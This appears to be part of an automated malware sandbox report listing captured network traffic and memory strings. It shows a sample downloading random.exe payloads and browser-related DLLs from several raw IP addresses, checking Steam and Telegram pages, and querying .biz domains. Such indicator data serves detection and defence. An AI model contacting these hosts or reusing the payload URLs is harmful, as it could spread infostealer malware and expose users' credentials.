Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /detct0r HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0Host: cineft.onlineConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.ZpMpph_5a4M.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo_c5__TAiALeuHoQOKG0BnSpdbJrQ/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /files/6209411516/H9TU4oY.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /files/206321495/ZiYbk6W.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /files/burpin1/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /files/fate/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/encoxx/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/flava/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16If-Modified-Since: Sat, 14 Dec 2024 22:32:01 GMTIf-None-Match: "675e0761-1c8c00"
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16If-Modified-Since: Sat, 14 Dec 2024 22:32:07 GMTIf-None-Match: "675e0767-1a6c00"
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16If-Modified-Since: Sat, 14 Dec 2024 22:30:05 GMTIf-None-Match: "675e06ed-ed000"
Source: global traffic	HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16If-Modified-Since: Sat, 14 Dec 2024 22:30:33 GMTIf-None-Match: "675e0709-29e800"
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache

Source: firefox.exe, 00000020.00000003.3323492995.000001D76C4BB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3331519614.000001D76C464000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3320833254.000001D76C4BB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000020.00000003.3347975849.000001D76F45C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 8://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000020.00000003.3254686843.000001D7652F5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3237549177.000001D765328000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3222273184.000001D7652F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 8https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000020.00000003.3254686843.000001D7652F5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3237549177.000001D765328000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3222273184.000001D7652F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 8https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000020.00000003.3347975849.000001D76F45C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 8www.youtube.com equals www.youtube.com (Youtube)
Source: c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: firefox.exe, 00000020.00000003.3073852793.000001D76C566000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000020.00000003.3073852793.000001D76C566000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000020.00000003.3254686843.000001D7652F5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3237549177.000001D765328000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3222273184.000001D7652F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000020.00000003.3254686843.000001D7652F5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3237549177.000001D765328000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3222273184.000001D7652F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000020.00000003.3346064434.000001D76F4D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: moz-extension://a581a2f1-688c-434b-8db8-16166b1993d9/injections/js/bug1842437-www.youtube.com-performance-now-precision.js equals www.youtube.com (Youtube)
Source: firefox.exe, 00000020.00000003.3357985948.000001D76C088000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 00000020.00000003.3347975849.000001D76F45C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 00000020.00000003.3357985948.000001D76C088000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.youtube.com- equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: shineugler.biz
Source: global traffic	DNS traffic detected: DNS query: immureprech.biz
